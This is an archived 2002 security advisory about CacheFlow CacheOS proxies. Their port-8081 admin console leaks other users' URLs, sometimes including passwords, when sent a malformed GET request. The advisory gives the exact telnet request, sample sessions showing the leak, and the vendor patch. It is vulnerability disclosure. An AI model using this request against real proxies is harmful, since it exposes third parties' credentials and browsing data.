Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Network Appliances :: napl4982.htm

CacheFlow Web admin interface may reveal user/pass to all



9th Jan 2002 [SBWID-4982]
COMMAND

	CacheFlow Web admin interface may reveal user/pass to all

SYSTEMS AFFECTED

	CacheOS v3.1.* maybe v4.*

PROBLEM

	In svindel.net research team advisory [http://www.svindel.net] :
	

	The CacheFlow has a web-admin interface open at port  8081  by  default.
	By sending a certain request, malicious hosts  can  view  parts  of  web
	pages and url\'s transferred through the cache at the time. Examples  of
	data that may be gathered using this  method  are,  usernames/passwords,
	form contents, url\'s etc..
	

	Exploit:
	

	telnet or use nc to connect to port 8081, then issue the following command:

	GET /Secure/Local/console/cmhome.htm

	

	Now legally in http you should also supply something  like  HTTP/1.0  at
	the end of that string, if you do that then the cache  replies  that  my
	station is not authorized to view page. If you omit HTTP/1.0 like I  did
	above, most times the cache just issues this:
	

	Example exploit session:
	

	localhost:~# telnet cacheflow 8081

	Trying xxx.xxx.xxx.xxx...

	Connected to cacheflow.

	Escape character is \'^]\'.

	GET /Secure/Local/console/cmhome.htm

	

	HTTP/1.0 200 OK

	

	Request cannot be honored

	Connection closed by foreign host

	

	

	But if you try multiple times it will sometimes  return  something  like
	this:
	

	 

	localhost:~# telnet cacheflow 8081

	Trying xxx.xxx.xxx.xxx...

	Connected to cacheflow.

	Escape character is \'^]\'.

	GET /Secure/Local/console/cmhome.htm

	

	HTTP/1.0 404-Not Found

	

	<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The

	request

	ed URL \"/Secure/Local/console/cmhome.htm

	

	Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234

	acbe

	&sid=3c234acbec234acbe&ord=1\" was not found on this

	server.<P></BODY>Connection

	closed by foreign host.

	

	

	As you can see, the chunk of  code  it  blurted  out  in  the  404  page
	contained part of an url that a client on the cache was visiting at  the
	time. We have also been able to read passwords from  URL\'s  using  this
	technique. There are probably more ways  to  exploit  this  and  greater
	holes to be found, but we didn\'t find any.. feel free  to  poke  around
	:)

SOLUTION

	 Update (05 Februrary 2002) 

	 ======

	

	Patch available from :
	

	http://download.cacheflow.com/

	

	The specific reference to the software update is  contained  within  the
	Release Notes for CacheOS Versions 4.0.14, Release ID 17085  and  17087,
	as follows:
	

	http://download.cacheflow.com/release/SA/4.0.14/relnotes.htm

	http://download.cacheflow.com/release/CA/4.0.14/relnotes.htm

	

	.SR 1-1350501: This update modified a condition  where  sending  \"GET\"
	to the console port could result in an illegible  message.  This  update
	addresses the potential BugTraq security issue.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH